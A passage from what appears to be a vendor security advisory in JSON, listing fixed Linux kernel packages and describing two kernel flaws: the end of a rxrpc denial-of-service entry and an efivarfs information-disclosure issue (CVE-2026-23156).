"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Linux kernel: Denial of Service via unsafe requeue in rxrpc_recvmsg"
},
{
"cve": "CVE-2026-23156",
"cwe": {
"id": "CWE-390",
"name": "Detection of Error Condition Without Action"
},
"discovery_date": "2026-02-14T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439951"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the efivarfs component of the Linux kernel. This vulnerability, an information disclosure issue, arises from incorrect error handling in the efivar_entry_get function. An unprivileged local attacker can exploit this by reading from efivarfs, potentially causing uninitialized kernel memory to be copied to userspace. This could allow the attacker to obtain sensitive kernel memory contents, which may aid in bypassing security mitigations.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Linux kernel: Information disclosure in efivarfs via incorrect error propagation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A local information disclosure issue exists in efivarfs due to incorrect error propagation in efivar_entry_get. The wrapper efivar_entry_get called __efivar_entry_get to retrieve EFI variable data but always returned success 0 even when the underlying function failed. This causes callers to treat the output buffers attributes size and data as valid even though the read may not have completed. In the efivarfs file read path efivarfs_file_read this can result in copying an uninitialized or partially initialized kernel heap buffer to userspace. An unprivileged local attacker who can read from efivarfs can potentially obtain kernel memory contents. Such leaks can expose sensitive information and may be useful to bypass mitigations such as KASLR in combination with other vulnerabilities.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
